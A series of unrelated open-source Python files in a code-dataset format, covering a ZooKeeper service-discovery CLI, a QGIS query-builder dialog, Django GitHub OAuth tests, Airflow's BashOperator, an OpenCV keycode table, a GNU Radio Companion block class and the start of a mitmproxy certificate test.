return self.get_services(self.COMMON_APP_NAME)
def get_endpoints(self, app_name, service_name):
"""Get a list of endpoints by the given application and service name."""
return self._get_children(
'/'.join([self.NAMESPACE, app_name, service_name, self.ENDPOINTS])
)
def get_common_endpoints(self, service_name):
"""Get a list of endpoints from the common application name and given
service name.
"""
return self.get_endpoints(self.COMMON_APP_NAME, service_name)
def is_service_common(self, service_name):
"""Checks if the given service name is in the common services application.
NOTE: Returns false if the service does not exist.
"""
zk = self._connect()
try:
result = bool(zk.exists('/'.join([
self.NAMESPACE,
self.COMMON_APP_NAME,
service_name
])))
finally:
self._disconnect(zk)
return result
def set_security_id_for_application(self, app_name, security_id):
"""Set the security id for the given application."""
zk = self._connect()
try:
path = '/'.join([
self.NAMESPACE,
app_name,
self.SECURITY,
self.SECURITY_ID
])
zk.ensure_path(path)
zk.set(path, security_id)
finally:
self._disconnect(zk)
def get_security_id(self, target):
"""
Given a app or common service name as target, this method determines if
the name is a common service or an applicaiton, and gets
the appropriate security id for it.
:param name: app name or common service name
:return: security_id
"""
if self.is_service_common(target):
target = '/'.join([self.COMMON_APP_NAME, target])
# return security id from cache if it exists
if target in self.securityIdCache:
return self.securityIdCache[target]
zk = self._connect()
result = None
try:
result = zk.get('/'.join([
self.NAMESPACE,
target,
self.SECURITY,
self.SECURITY_ID
]))[0]
self.securityIdCache[target] = result
except NoNodeError:
pass
finally:
self._disconnect(zk)
return result
def set_security_id_for_common_service(self, service_name, security_id):
"""Set the security id for the given common service."""
self.set_security_id_for_application(
'/'.join([self.COMMON_APP_NAME, service_name]),
security_id
)
ACTIONS = {
'register': {
'args': [5, 'Must provide app name, service name, host and port.'],
'method': register_endpoint
},
'register-common-services': {
'args': [4, 'Must provide service name, host and port.'],
'method': register_common_endpoint
},
'unregister': {
'args': [5, 'Must provide app name, service name, host and port.'],
'method': unregister_endpoint
},
'unregister-common-services': {
'args': [4, 'Must provide service name, host and port.'],
'method': unregister_common_endpoint
},
'list-applications': {
'method': get_applications
},
'list-services': {
'args': [2, 'Must provide an app name.'],
'method': get_services
},
'list-common-services': {
'method': get_common_services
},
'list-endpoints': {
'args': [3, 'Must provide app name, service name.'],
'method': get_endpoints
},
'list-common-endpoints': {
'args': [2, 'Must provide a common service name.'],
'method': get_common_endpoints
},
'is-service-common': {
'args': [2, 'Must provide a service name.'],
'method': is_service_common
},
'application-set-security-id': {
'args': [3, 'Must provide an app name and security id.'],
'method': get_security_id
},
'application-get-security-id': {
'args': [2, 'Must provide an app name.'],
'method': get_security_id
},
'common-service-set-security-id': {
'args': [3, 'Must provide a service name and security id.'],
'method': set_security_id_for_common_service
},
'common-service-get-security-id': {
'args': [2, 'Must provide a service name.'],
'method': get_security_id
},
}
def exec_cmd_line(self, args):
"""
execute command line
"""
action = args[0]
if action in self.ACTIONS:
action = self.ACTIONS[action]
if 'args' in action:
_arg_count(args, action['args'][0], action['args'][1])
method_args = [self] + args[1:]
result = action['method'](*method_args)
if result is not None: # Some commands return a boolean.
if isinstance(result, list):
for i in result:
print i
else:
print result
else:
print 'Invalid action: ' + action
sys.exit(1)
def _arg_count(args, number, message='Invalid arguments.'):
"""Counts the arguments given and exits with failed status if needed.
Really just a convenience method for the main method, not part of the
discovery API.
"""
if len(args) < number:
print message
sys.exit(1)
def invalid_action(action=''):
"""Prints an error message and exits."""
if action:
print 'Invalid action: ' % action
else:
print 'Action not specified.'
sys.exit(1)
def main():
"""Module will act as a command line utility if not imported as a module in
another application.
"""
parser = optparse.OptionParser(
usage='usage: %prog [options] ACTION arg1 arg2 ...'
)
parser.add_option(
'-z',
'--zookeeper',
default='localhost:2181',
help='Zookeeper location (host:port).'
)
options, args = parser.parse_args()
if not args:
invalid_action()
ServiceDiscoveryClient(options.zookeeper).exec_cmd_line(args)
if __name__ == '__main__':
main()
| apache-2.0 |
NINAnor/QGIS | python/plugins/db_manager/dlg_query_builder.py | 3 | 15563 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : March 2015
copyright : (C) 2015 Hugo Mercier / Oslandia
email : hugo dot mercier at oslandia dot com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
Query builder dialog, based on the QSpatialite plugin (GPLv2+) by Romain Riviere
"""
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from .ui.ui_DlgQueryBuilder import Ui_DbManagerQueryBuilderDlg as Ui_Dialog
from .db_plugins.plugin import VectorTable
class FocusEventFilter(QObject):
def __init__(self, parent):
QObject.__init__(self, parent)
self.focus = ''
def eventFilter(self, obj, event):
if event.type() == QEvent.FocusIn:
self.focus = obj.objectName()
return QObject.eventFilter(self, obj, event)
def insertWithSelection(widget, text):
if widget.textCursor().hasSelection(): # user has selectedsomething...
selection = widget.textCursor().selectedText()
widget.insertPlainText(text + selection + ")")
else:
widget.insertPlainText(text)
def insertWithSelectionOn(parent, objectname, text):
"""Insert the text in a QTextEdit given by its objectname"""
w = parent.findChild(QTextEdit, objectname)
insertWithSelection(w, text)
class QueryBuilderDlg(QDialog):
# object used to store parameters between invocations
saveParameter = None
def __init__(self, iface, db, parent=None, reset=False):
QDialog.__init__(self, parent)
self.iface = iface
self.db = db
self.query = ''
self.ui = Ui_Dialog()
self.ui.setupUi(self)
self.ui.group.setMaximumHeight(self.ui.tab.sizeHint().height())
self.ui.order.setMaximumHeight(self.ui.tab.sizeHint().height())
self.evt = FocusEventFilter(self)
self.ui.col.installEventFilter(self.evt)
self.ui.where.installEventFilter(self.evt)
self.ui.group.installEventFilter(self.evt)
self.ui.order.installEventFilter(self.evt)
d = self.db.connector.getQueryBuilderDictionary()
#Application default parameters
self.table = None
self.col_col = []
self.col_where = []
self.coltables = []
self.ui.extract.setChecked(True)
#ComboBox default values
self.ui.functions.insertItems(1, d['function'])
self.ui.math.insertItems(1, d['math'])
self.ui.aggregates.insertItems(1, d['aggregate'])
self.ui.operators.insertItems(1, d['operator'])
self.ui.stringfct.insertItems(1, d['string'])
#self.ui.Rtree.insertItems(1,rtreecommand)
# restore last query if needed
if reset:
QueryBuilderDlg.saveParameter = None
if QueryBuilderDlg.saveParameter is not None:
self.restoreLastQuery()
#Show Tables
self.show_tables()
#Signal/slot
QObject.connect(self.ui.aggregates, SIGNAL("currentIndexChanged(const QString&)"), self.add_aggregate)
QObject.connect(self.ui.stringfct, SIGNAL("currentIndexChanged(const QString&)"), self.add_stringfct)
QObject.connect(self.ui.operators, SIGNAL("currentIndexChanged(const QString&)"), self.add_operators)
QObject.connect(self.ui.functions, SIGNAL("currentIndexChanged(const QString&)"), self.add_functions)
QObject.connect(self.ui.math, SIGNAL("currentIndexChanged(const QString&)"), self.add_math)
QObject.connect(self.ui.tables, SIGNAL("currentIndexChanged(const QString&)"), self.add_tables)
QObject.connect(self.ui.tables, SIGNAL("currentIndexChanged(const QString&)"), self.list_cols)
QObject.connect(self.ui.columns, SIGNAL("currentIndexChanged(const QString&)"), self.add_columns)
QObject.connect(self.ui.columns_2, SIGNAL("currentIndexChanged(const QString&)"), self.list_values)
QObject.connect(self.ui.reset, SIGNAL("clicked(bool)"), self.reset)
QObject.connect(self.ui.extract, SIGNAL("stateChanged(int)"), self.list_values)
QObject.connect(self.ui.values, SIGNAL("doubleClicked(const QModelIndex &)"), self.query_item)
QObject.connect(self.ui.buttonBox, SIGNAL("accepted()"), self.validate)
QObject.connect(self.ui.checkBox, SIGNAL("stateChanged(int)"), self.show_tables)
if self.db.explicitSpatialIndex():
self.tablesGeo = [table for table in self.tables if isinstance(table, VectorTable)]
tablesGeo = ['"%s"."%s"' % (table.name, table.geomColumn) for table in self.tablesGeo]
self.ui.table_target.insertItems(1, tablesGeo)
self.idxTables = [table for table in self.tablesGeo if table.hasSpatialIndex()]
idxTables = ['"%s"."%s"' % (table.name, table.geomColumn) for table in self.idxTables]
self.ui.table_idx.insertItems(1, idxTables)
QObject.connect(self.ui.usertree, SIGNAL("clicked(bool)"), self.use_rtree)
else:
self.ui.toolBox.setItemEnabled(2, False)
def update_table_list(self):
self.tables = []
add_sys_tables = self.ui.checkBox.isChecked()
schemas = self.db.schemas()
if schemas is None:
self.tables = self.db.tables(None, add_sys_tables)
else:
for schema in schemas:
self.tables += self.db.tables(schema, add_sys_tables)
def show_tables(self):
self.update_table_list()
self.ui.tables.clear()
self.ui.tables.insertItems(0, ["Tables"])
self.ui.tables.insertItems(1, [t.name for t in self.tables])
def add_aggregate(self):
if self.ui.aggregates.currentIndex() <= 0:
return
ag = self.ui.aggregates.currentText()
insertWithSelection(self.ui.col, ag)
self.ui.aggregates.setCurrentIndex(0)
def add_functions(self):
if self.ui.functions.currentIndex() <= 0:
return
ag = self.ui.functions.currentText()
insertWithSelectionOn(self, self.evt.focus, ag)
self.ui.functions.setCurrentIndex(0)
def add_stringfct(self):
if self.ui.stringFct.currentIndex() <= 0:
return
ag = self.ui.stringfct.currentText()
insertWithSelectionOn(self, self.evt.focus, ag)
self.ui.stringfct.setCurrentIndex(0)
def add_math(self):
if self.ui.math.currentIndex() <= 0:
return
ag = self.ui.math.currentText()
insertWithSelectionOn(self, self.evt.focus, ag)
self.ui.math.setCurrentIndex(0)
def add_operators(self):
if self.ui.operators.currentIndex() <= 0:
return
ag = self.ui.operators.currentText()
if self.evt.focus == "where": # in where section
self.ui.where.insertPlainText(ag)
else:
self.ui.col.insertPlainText(ag)
self.ui.operators.setCurrentIndex(0)
def add_tables(self):
if self.ui.tables.currentIndex() <= 0:
return
ag = self.ui.tables.currentText()
#Retrieve Table Object from txt
tableObj = [table for table in self.tables if table.name.upper() == ag.upper()]
if len(tableObj) != 1:
return # No object with this name
self.table = tableObj[0]
if (ag in self.coltables): # table already use
response = QMessageBox.question(self, "Table already used", "Do you want to add table %s again?" % ag, QMessageBox.Yes | QMessageBox.No)
if response == QMessageBox.No:
return
ag = self.table.quotedName()
txt = self.ui.tab.text()
if (txt is None) or (txt in ("", " ")):
self.ui.tab.setText('%s' % ag)
else:
self.ui.tab.setText('%s, %s' % (txt, ag))
self.ui.tables.setCurrentIndex(0)
def add_columns(self):
if self.ui.columns.currentIndex() <= 0:
return
ag = self.ui.columns.currentText()
if self.evt.focus == "where": # in where section
if ag in self.col_where: # column already called in where section
response = QMessageBox.question(self, "Column already used in WHERE clause", "Do you want to add column %s again?" % ag, QMessageBox.Yes | QMessageBox.No)
if response == QMessageBox.No:
self.ui.columns.setCurrentIndex(0)
return
self.ui.where.insertPlainText(ag)
self.col_where.append(ag)
elif self.evt.focus == "col":
if ag in self.col_col: # column already called in col section
response = QMessageBox.question(self, "Column already used in COLUMNS section", "Do you want to add column %s again?" % ag, QMessageBox.Yes | QMessageBox.No)
if response == QMessageBox.No:
self.ui.columns.setCurrentIndex(0)
return
if len(self.ui.col.toPlainText().strip()) > 0:
self.ui.col.insertPlainText(",\n" + ag)
else:
self.ui.col.insertPlainText(ag)
self.col_col.append(ag)
elif self.evt.focus == "group":
if len(self.ui.group.toPlainText().strip()) > 0:
self.ui.group.insertPlainText(", " + ag)
else:
self.ui.group.insertPlainText(ag)
elif self.evt.focus == "order":
if len(self.ui.order.toPlainText().strip()) > 0:
self.ui.order.insertPlainText(", " + ag)
else:
self.ui.order.insertPlainText(ag)
self.ui.columns.setCurrentIndex(0)
def list_cols(self):
table = self.table
if (table is None):
return
if (table.name in self.coltables):
return
columns = ['"%s"."%s"' % (table.name, col.name) for col in table.fields()]
#add special '*' column:
columns = ['"%s".*' % table.name] + columns
self.coltables.append(table.name) # table columns have been listed
# first and second col combobox
end = self.ui.columns.count()
self.ui.columns.insertItems(end, columns)
self.ui.columns_2.insertItems(end, columns)
end = self.ui.columns.count()
self.ui.columns.insertSeparator(end)
self.ui.columns_2.insertSeparator(end)
def list_values(self):
if self.ui.columns_2.currentIndex() <= 0:
return
item = self.ui.columns_2.currentText()
#recover column and table:
column = item.split(".") # "table".'column'
table = column[0]
if column[1] == '*':
return
table = table[1:-1]
qtable = [t for t in self.tables if t.name.lower() == table.lower()][0].quotedName()
if self.ui.extract.isChecked():
limit = 10
else:
limit = None
model = self.db.columnUniqueValuesModel(item, qtable, limit)
self.ui.values.setModel(model)
def query_item(self, index):
queryWord = index.data()
queryWord = ' "%s"' % queryWord
if queryWord != '':
self.ui.where.insertPlainText(queryWord)
self.ui.where.setFocus()
def use_rtree(self):
idx = self.ui.table_idx.currentText()
if idx in (None, "", " ", "Table (with Spatial Index)"):
return
try:
tab_idx = idx.split(".")[0][1:-1] # remove "
col_idx = idx.split(".")[1][1:-1] # remove '
except:
pop_up_error("All fields are necessary", self)
tgt = self.ui.table_target.currentText()
if tgt in (None, "", " ", "Table (Target)"):
return
tgt_tab = tgt.split('.')[0][1:-1]
tgt_col = tgt.split('.')[1][1:-1]
sql = ""
if self.ui.where.toPlainText() not in (None, "", " "):
sql += "\nAND"
sql += self.db.spatialIndexClause(tab_idx, col_idx, tgt_tab, tgt_col)
self.ui.where.insertPlainText(sql)
def reset(self):
#reset lists:
self.ui.values.setModel(None)
self.ui.columns_2.clear()
self.ui.columns.insertItems(0, ["Columns"])
self.ui.columns_2.insertItems(0, ["Columns"])
self.coltables = []
self.col_col = []
self.col_where = []
def validate(self):
query_col = unicode(self.ui.col.toPlainText())
query_table = unicode(self.ui.tab.text())
query_where = unicode(self.ui.where.toPlainText())
query_group = unicode(self.ui.group.toPlainText())
query_order = unicode(self.ui.order.toPlainText())
query = ""
if query_col.strip() != '':
query += "SELECT %s \nFROM %s" % (query_col, query_table)
if query_where.strip() != '':
query += "\nWHERE %s" % query_where
if query_group.strip() != '':
query += "\nGROUP BY %s" % query_group
if query_order.strip() != '':
query += "\nORDER BY %s" % query_order
if query == '':
return
self.query = query
saveParameter = {}
saveParameter["coltables"] = self.coltables
saveParameter["col_col"] = self.col_col
saveParameter["col_where"] = self.col_where
saveParameter["col"] = query_col
saveParameter["tab"] = query_table
saveParameter["where"] = query_where
saveParameter["group"] = query_group
saveParameter["order"] = query_order
QueryBuilderDlg.saveParameter = saveParameter
def restoreLastQuery(self):
self.update_table_list()
saveParameter = QueryBuilderDlg.saveParameter
self.coltables = saveParameter["coltables"]
self.col_col = saveParameter["col_col"]
self.col_where = saveParameter["col_where"]
self.ui.col.insertPlainText(saveParameter["col"])
self.ui.tab.setText(saveParameter["tab"])
self.ui.where.insertPlainText(saveParameter["where"])
self.ui.order.setPlainText(saveParameter["order"])
self.ui.group.setPlainText(saveParameter["group"])
#list previous colist:
for tablename in self.coltables:
#Retrieve table object from table name:
table = [table for table in self.tables if table.name.upper() == tablename.upper()]
if len(table) != 1:
break
table = table[0]
columns = ['"%s"."%s"' % (table.name, col.name) for col in table.fields()]
# first and second col combobox
end = self.ui.columns.count()
self.ui.columns.insertItems(end, columns)
self.ui.columns_2.insertItems(end, columns)
end = self.ui.columns.count()
self.ui.columns.insertSeparator(end)
self.ui.columns_2.insertSeparator(end)
| gpl-2.0 |
Soovox/django-socialregistration | socialregistration/contrib/github/tests.py | 10 | 1369 | from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import TestCase
from socialregistration.contrib.github.models import GithubProfile
from socialregistration.tests import TemplateTagTest, OAuth2Test
import json
import urllib
class TestTemplateTag(TemplateTagTest, TestCase):
def get_tag(self):
return 'github', 'github_button'
class TestGithub(OAuth2Test, TestCase):
profile = GithubProfile
def get_redirect_url(self):
return reverse('socialregistration:github:redirect')
def get_callback_url(self):
return reverse('socialregistration:github:callback')
def get_setup_callback_url(self):
return reverse('socialregistration:github:setup')
def get_callback_mock_response(self, *args, **kwargs):
return {'status': '200'}, urllib.urlencode({
'access_token': '456'})
def get_setup_callback_mock_response(self, *args, **kwargs):
return {'status': '200'}, json.dumps({'login': '123'})
def create_profile(self, user):
GithubProfile.objects.create(user=user, github='123')
class TestAuthenticationBackend(TestCase):
def test_authentication_backend_should_be_configured_in_settings(self):
self.assertTrue('socialregistration.contrib.github.auth.GithubAuth' in settings.AUTHENTICATION_BACKENDS)
| mit |
saguziel/incubator-airflow | airflow/operators/bash_operator.py | 29 | 3891 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import bytes
import os
import signal
import logging
from subprocess import Popen, STDOUT, PIPE
from tempfile import gettempdir, NamedTemporaryFile
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
from airflow.utils.file import TemporaryDirectory
class BashOperator(BaseOperator):
"""
Execute a Bash script, command or set of commands.
:param bash_command: The command, set of commands or reference to a
bash script (must be '.sh') to be executed.
:type bash_command: string
:param xcom_push: If xcom_push is True, the last line written to stdout
will also be pushed to an XCom when the bash command completes.
:type xcom_push: bool
:param env: If env is not None, it must be a mapping that defines the
environment variables for the new process; these are used instead
of inheriting the current process environment, which is the default
behavior. (templated)
:type env: dict
:type output_encoding: output encoding of bash command
"""
template_fields = ('bash_command', 'env')
template_ext = ('.sh', '.bash',)
ui_color = '#f0ede4'
@apply_defaults
def __init__(
self,
bash_command,
xcom_push=False,
env=None,
output_encoding='utf-8',
*args, **kwargs):
super(BashOperator, self).__init__(*args, **kwargs)
self.bash_command = bash_command
self.env = env
self.xcom_push_flag = xcom_push
self.output_encoding = output_encoding
def execute(self, context):
"""
Execute the bash command in a temporary directory
which will be cleaned afterwards
"""
bash_command = self.bash_command
logging.info("tmp dir root location: \n" + gettempdir())
with TemporaryDirectory(prefix='airflowtmp') as tmp_dir:
with NamedTemporaryFile(dir=tmp_dir, prefix=self.task_id) as f:
f.write(bytes(bash_command, 'utf_8'))
f.flush()
fname = f.name
script_location = tmp_dir + "/" + fname
logging.info("Temporary script "
"location :{0}".format(script_location))
logging.info("Running command: " + bash_command)
sp = Popen(
['bash', fname],
stdout=PIPE, stderr=STDOUT,
cwd=tmp_dir, env=self.env,
preexec_fn=os.setsid)
self.sp = sp
logging.info("Output:")
line = ''
for line in iter(sp.stdout.readline, b''):
line = line.decode(self.output_encoding).strip()
logging.info(line)
sp.wait()
logging.info("Command exited with "
"return code {0}".format(sp.returncode))
if sp.returncode:
raise AirflowException("Bash command failed")
if self.xcom_push_flag:
return line
def on_kill(self):
logging.info('Sending SIGTERM signal to bash process group')
os.killpg(os.getpgid(self.sp.pid), signal.SIGTERM)
| apache-2.0 |
axelstram/deep-visualization-toolbox | keys.py | 12 | 4628 | # Define keys
#class KeyPatten(object):
# '''Define a pattern that will be matched against a keycode.
#
# A KeyPattern is used to determine which key was pressed in
# OpenCV. This process is complicated by the fact that different
# platforms define different key codes for each key. Further, on
# some platforms the value returned by OpenCV is different than that
# returned by Python ord(). See the following link for more
# information:
# https://stackoverflow.com/questions/14494101/using-other-keys-for-the-waitkey-function-of-opencv/20577067#20577067
# '''
# def __init__(self, code, mask = None):
# self.code = code
# self.mask = mask
# #self.mask = 0xffffffff # 64 bits. All codes observed so far are < 2**64
# Larger masks (requiring a more specific pattern) are matched first
key_data = []
for letter in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789':
#for letter in 'abefghijklmnopqrstuvwxyzABEFGHIJKLMNOPQRSTUVWXYZ01456789':
key_data.append((letter, ord(letter), 0xff)) # Match only lowest byte
key_data.extend([
# Mac (note diff order vs Linux)
('up', 0xf700, 0xffff),
('down', 0xf701, 0xffff),
('left', 0xf702, 0xffff),
('right', 0xf703, 0xffff),
# Ubuntu US/UK (note diff order vs Mac)
('left', 0xff51, 0xffff),
('up', 0xff52, 0xffff),
('right', 0xff53, 0xffff),
('down', 0xff54, 0xffff),
# Ubuntu only; modified keys to not produce separate events on
# Mac. These are included only so they be ignored without
# producing error messages.
('leftshift', 0xffe1, 0xffff),
('rightshift', 0xffe2, 0xffff),
('leftctrl', 0xffe3, 0xffff),
('rightctrl', 0xffe4, 0xffff),
('esc', 27, 0xff), # Mac
('enter', 13, 0xff), # Mac
('enter', 10, 0xff), # Ubuntu with UK keyboard
])
key_patterns = dict()
# Store key_patterns by mask in a dict of dicts
# Eventually, e.g.:
# key_patterns[0xff][97] = 'a'
for key_datum in key_data:
#print key_datum
assert len(key_datum) in (2,3), 'Key information should be tuple of length 2 or 3 but it is %s' % repr(key_datum)
if len(key_datum) == 3:
label, key_code, mask = key_datum
else:
label, key_code = key_datum
mask = 0xffffffff # 64 bits. All codes observed so far are < 2**64
if not mask in key_patterns:
key_patterns[mask] = dict()
if key_code in key_patterns[mask]:
old_label = key_patterns[mask][code]
if old_label != label:
print 'Warning: key_patterns[%s][%s] old value %s being overwritten with %s' % (mask, key_code, old_label, label)
if key_code != (key_code & mask):
print 'Warning: key_code %s for key label %s will never trigger using mask %s' % (key_code, label, mask)
key_patterns[mask][key_code] = label
#if not label in key_patterns[mask]:
# key_patterns[mask][label] = set()
#key_patterns[mask][label].add(code)
#class Key:
# up=(63232, 'up')
# right=(63235, 'right')
# down=(63233, 'down')
# left=(63234, 'left')
# esc=(27, 'esc')
# enter=(13, 'enter')
# a =(ord('a'),'a')
# b =(ord('b'),'b')
# c =(ord('c'),'c')
# d =(ord('d'),'d')
# e =(ord('e'),'e')
# f =(ord('f'),'f')
# g =(ord('g'),'g')
# h =(ord('h'),'h')
# i =(ord('i'),'i')
# j =(ord('j'),'j')
# k =(ord('k'),'k')
# l =(ord('l'),'l')
# m =(ord('m'),'m')
# n =(ord('n'),'n')
# o =(ord('o'),'o')
# p =(ord('p'),'p')
# q =(ord('q'),'q')
# r =(ord('r'),'r')
# s =(ord('s'),'s')
# t =(ord('t'),'t')
# u =(ord('u'),'u')
# v =(ord('v'),'v')
# w =(ord('w'),'w')
# x =(ord('x'),'x')
# y =(ord('y'),'y')
# z =(ord('z'),'z')
# A =(ord('A'),'A')
# B =(ord('B'),'B')
# C =(ord('C'),'C')
# D =(ord('D'),'D')
# E =(ord('E'),'E')
# F =(ord('F'),'F')
# G =(ord('G'),'G')
# H =(ord('H'),'H')
# I =(ord('I'),'I')
# J =(ord('J'),'J')
# K =(ord('K'),'K')
# L =(ord('L'),'L')
# M =(ord('M'),'M')
# N =(ord('N'),'N')
# O =(ord('O'),'O')
# P =(ord('P'),'P')
# Q =(ord('Q'),'Q')
# R =(ord('R'),'R')
# S =(ord('S'),'S')
# T =(ord('T'),'T')
# U =(ord('U'),'U')
# V =(ord('V'),'V')
# W =(ord('W'),'W')
# X =(ord('X'),'X')
# Y =(ord('Y'),'Y')
# Z =(ord('Z'),'Z')
# n1=(ord('1'),'1')
# n2=(ord('2'),'2')
# n3=(ord('3'),'3')
# n4=(ord('4'),'4')
# n5=(ord('5'),'5')
# n6=(ord('6'),'6')
# n7=(ord('7'),'7')
# n8=(ord('8'),'8')
# n9=(ord('9'),'9')
# n0=(ord('0'),'0')
| mit |
levelrf/level_basestation | grc/gui/Block.py | 5 | 6651 | """
Copyright 2007, 2008, 2009 Free Software Foundation, Inc.
This file is part of GNU Radio
GNU Radio Companion is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
GNU Radio Companion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
from Element import Element
import Utils
import Colors
from .. base import odict
from Constants import BORDER_PROXIMITY_SENSITIVITY
from Constants import \
BLOCK_LABEL_PADDING, \
PORT_SEPARATION, LABEL_SEPARATION, \
PORT_BORDER_SEPARATION, POSSIBLE_ROTATIONS
import pygtk
pygtk.require('2.0')
import gtk
import pango
BLOCK_MARKUP_TMPL="""\
#set $foreground = $block.is_valid() and 'black' or 'red'
<span foreground="$foreground" font_desc="Sans 8"><b>$encode($block.get_name())</b></span>"""
class Block(Element):
"""The graphical signal block."""
def __init__(self):
"""
Block contructor.
Add graphics related params to the block.
"""
#add the position param
self.get_params().append(self.get_parent().get_parent().Param(
block=self,
n=odict({
'name': 'GUI Coordinate',
'key': '_coordinate',
'type': 'raw',
'value': '(0, 0)',
'hide': 'all',
})
))
self.get_params().append(self.get_parent().get_parent().Param(
block=self,
n=odict({
'name': 'GUI Rotation',
'key': '_rotation',
'type': 'raw',
'value': '0',
'hide': 'all',
})
))
Element.__init__(self)
def get_coordinate(self):
"""
Get the coordinate from the position param.
Returns:
the coordinate tuple (x, y) or (0, 0) if failure
"""
try: #should evaluate to tuple
coor = eval(self.get_param('_coordinate').get_value())
x, y = map(int, coor)
fgW,fgH = self.get_parent().get_size()
if x <= 0:
x = 0
elif x >= fgW - BORDER_PROXIMITY_SENSITIVITY:
x = fgW - BORDER_PROXIMITY_SENSITIVITY
if y <= 0:
y = 0
elif y >= fgH - BORDER_PROXIMITY_SENSITIVITY:
y = fgH - BORDER_PROXIMITY_SENSITIVITY
return (x, y)
except:
self.set_coordinate((0, 0))
return (0, 0)
def set_coordinate(self, coor):
"""
Set the coordinate into the position param.
Args:
coor: the coordinate tuple (x, y)
"""
self.get_param('_coordinate').set_value(str(coor))
def get_rotation(self):
"""
Get the rotation from the position param.
Returns:
the rotation in degrees or 0 if failure
"""
try: #should evaluate to dict
rotation = eval(self.get_param('_rotation').get_value())
return int(rotation)
except:
self.set_rotation(POSSIBLE_ROTATIONS[0])
return POSSIBLE_ROTATIONS[0]
def set_rotation(self, rot):
"""
Set the rotation into the position param.
Args:
rot: the rotation in degrees
"""
self.get_param('_rotation').set_value(str(rot))
def create_shapes(self):
"""Update the block, parameters, and ports when a change occurs."""
Element.create_shapes(self)
if self.is_horizontal(): self.add_area((0, 0), (self.W, self.H))
elif self.is_vertical(): self.add_area((0, 0), (self.H, self.W))
def create_labels(self):
"""Create the labels for the signal block."""
Element.create_labels(self)
self._bg_color = self.get_enabled() and Colors.BLOCK_ENABLED_COLOR or Colors.BLOCK_DISABLED_COLOR
layouts = list()
#create the main layout
layout = gtk.DrawingArea().create_pango_layout('')
layouts.append(layout)
layout.set_markup(Utils.parse_template(BLOCK_MARKUP_TMPL, block=self))
self.label_width, self.label_height = layout.get_pixel_size()
#display the params
markups = [param.get_markup() for param in self.get_params() if param.get_hide() not in ('all', 'part')]
if markups:
layout = gtk.DrawingArea().create_pango_layout('')
layout.set_spacing(LABEL_SEPARATION*pango.SCALE)
layout.set_markup('\n'.join(markups))
layouts.append(layout)
w,h = layout.get_pixel_size()
self.label_width = max(w, self.label_width)
self.label_height += h + LABEL_SEPARATION
width = self.label_width
height = self.label_height
#setup the pixmap
pixmap = self.get_parent().new_pixmap(width, height)
gc = pixmap.new_gc()
gc.set_foreground(self._bg_color)
pixmap.draw_rectangle(gc, True, 0, 0, width, height)
#draw the layouts
h_off = 0
for i,layout in enumerate(layouts):
w,h = layout.get_pixel_size()
if i == 0: w_off = (width-w)/2
else: w_off = 0
pixmap.draw_layout(gc, w_off, h_off, layout)
h_off = h + h_off + LABEL_SEPARATION
#create vertical and horizontal pixmaps
self.horizontal_label = pixmap
if self.is_vertical():
self.vertical_label = self.get_parent().new_pixmap(height, width)
Utils.rotate_pixmap(gc, self.horizontal_label, self.vertical_label)
#calculate width and height needed
self.W = self.label_width + 2*BLOCK_LABEL_PADDING
self.H = max(*(
[self.label_height+2*BLOCK_LABEL_PADDING] + [2*PORT_BORDER_SEPARATION + \
sum([port.H + PORT_SEPARATION for port in ports]) - PORT_SEPARATION
for ports in (self.get_sources(), self.get_sinks())]
))
def draw(self, gc, window):
"""
Draw the signal block with label and inputs/outputs.
Args:
gc: the graphics context
window: the gtk window to draw on
"""
x, y = self.get_coordinate()
#draw main block
Element.draw(
self, gc, window, bg_color=self._bg_color,
border_color=self.is_highlighted() and Colors.HIGHLIGHT_COLOR or Colors.BORDER_COLOR,
)
#draw label image
if self.is_horizontal():
window.draw_drawable(gc, self.horizontal_label, 0, 0, x+BLOCK_LABEL_PADDING, y+(self.H-self.label_height)/2, -1, -1)
elif self.is_vertical():
window.draw_drawable(gc, self.vertical_label, 0, 0, x+(self.H-self.label_height)/2, y+BLOCK_LABEL_PADDING, -1, -1)
#draw ports
for port in self.get_ports(): port.draw(gc, window)
def what_is_selected(self, coor, coor_m=None):
"""
Get the element that is selected.
Args:
coor: the (x,y) tuple
coor_m: the (x_m, y_m) tuple
Returns:
this block, a port, or None
"""
for port in self.get_ports():
port_selected = port.what_is_selected(coor, coor_m)
if port_selected: return port_selected
return Element.what_is_selected(self, coor, coor_m)
| gpl-3.0 |
laurmurclar/mitmproxy | test/mitmproxy/test_certs.py | 1 | 6730 | import os
from mitmproxy import certs
from mitmproxy.test import tutils
# class TestDNTree:
# def test_simple(self):
# d = certs.DNTree()
# d.add("foo.com", "foo")
# d.add("bar.com", "bar")
# assert d.get("foo.com") == "foo"
# assert d.get("bar.com") == "bar"
# assert not d.get("oink.com")
# assert not d.get("oink")
# assert not d.get("")
# assert not d.get("oink.oink")
#
# d.add("*.match.org", "match")
# assert not d.get("match.org")
# assert d.get("foo.match.org") == "match"
# assert d.get("foo.foo.match.org") == "match"
#
# def test_wildcard(self):
# d = certs.DNTree()
# d.add("foo.com", "foo")
# assert not d.get("*.foo.com")
# d.add("*.foo.com", "wild")
#
# d = certs.DNTree()
